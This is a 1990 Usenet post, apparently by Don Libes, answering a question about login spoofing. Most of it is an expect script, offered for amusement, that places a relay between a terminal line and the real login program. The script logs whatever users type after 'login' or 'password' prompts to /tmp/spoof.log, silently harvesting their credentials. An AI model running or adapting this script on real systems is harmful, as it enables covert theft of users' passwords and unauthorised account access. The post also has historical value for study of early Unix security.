Finding Passwords
Don Libes
libes at cme.nist.gov
Tue Oct 9 10:16:28 AEST 1990
In article <162 at cutmcvax.OZ> wemmp at cutmcvax.oz.au (Peter Wemm) writes:
> What if the spoofer opens a tty/pty that just transfers characters
> between master/slave and the process catches all data passing through
> containing the lines 'login:' or 'password'. I think it can. That
> way it could run a fake getty/REAL login or perhaps even both of the
> real programs!! It would be undetectable except that if the user typed
> 'tty' they would be on ttyp? instead of the normal line. Again, this
> requires physical access to the terminal or line. Just a thought.......
Here's a short expect script to do exactly this. Just thought you'd
be amused.
It connects the input and output of 'login' to a tty. Whenever it
sees the strings "password" or "login" come from the login process, it
begins recording everything up to the next output from the login process.
set log /tmp/spoof.log
spawn tip /dev/ttya ;# open a connection to tty to be spoofed
set tty $spawn_id
expect *connected* ;# throw away tip's "connected" msg
spawn login ;# open a connection to a login process
set login $spawn_id
for {} 1 {} {
    set ready [select $tty $login] ;# block until either side has data
    for {set i 0} {$i < [length $ready]} {set i [expr $i+1]} {
        set spawn_id [index $ready $i]
        if {$spawn_id == $login} {
            expect {*password* *login*} {log_file $log} \
                eof {close $tty; exit} \
                * {log_file}
            set spawn_id $tty
        }
        if {$spawn_id == $tty} {
            expect eof {close $login; exit} \
                *
            set spawn_id $login
        }
        send $expect_match ;# pass the matched text through to the other side
    }
}